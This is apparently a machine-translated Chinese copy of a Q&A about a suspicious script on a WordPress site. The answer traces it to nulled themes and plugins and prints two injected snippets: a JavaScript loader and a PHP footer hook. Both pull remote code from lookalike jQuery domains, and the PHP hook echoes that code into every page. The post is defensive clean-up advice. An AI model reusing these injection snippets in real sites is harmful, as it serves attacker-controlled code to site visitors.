[英]Remove script from wordpress site
我正在使用恶意软件字节,每次访问我的wordpress网站时,它都会阻止尝试在页面上运行的脚本,脚本是:
<script type="text/javascript">
if (!document.referrer || document.referrer == '') {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
} else {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
}
</script>
我不确定它是否是恶意的但我想删除它,但我不知道哪个插件或文件导致它,我已经尝试查看页面源等。
脚本意味着什么,有没有办法找出导致它的原因?
任何帮助将不胜感激。
您正在使用wordpress插件或主题,您可能从“nulled”主题和插件的存储库中下载。
几乎所有这些网站都使用商业模式,他们提供高级主题和插件,通常免费花费5美元-75美元。
但俗话说,没有免费的午餐。 作为免费插件/主题的交换,网站所有者添加了包含来自外部域的js文件的代码,该文件为您的网站添加了横幅。
为了防止网站站长或开发人员立即注意到横幅(或只是反向链接或三个),以管理员身份登录的任何人或/和没有推荐人网址的任何人都不会显示广告。
在你的情况下,有效载荷是从一个类似于真实的域的域中包含的,从而欺骗了没有经验的Wordpress网站管理员作为属于jQuery的东西。 官方jQuery CDN位于这里//code.jquery.com/
确保从阴暗的地方检查所有主题或插件的类似代码,这些代码也可能在图像文件内,尽管通常在init.php或functions.php中。 这是使用jquery域的不同变体的类似代码的另一个示例。
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
if (@fopen($jquery,'r')){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
您可以使用此问题中提出的应用程序之一在wordpress目录中搜索此脚本: 用于在不编制索引的情况下搜索文件中的字符串的工具 。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.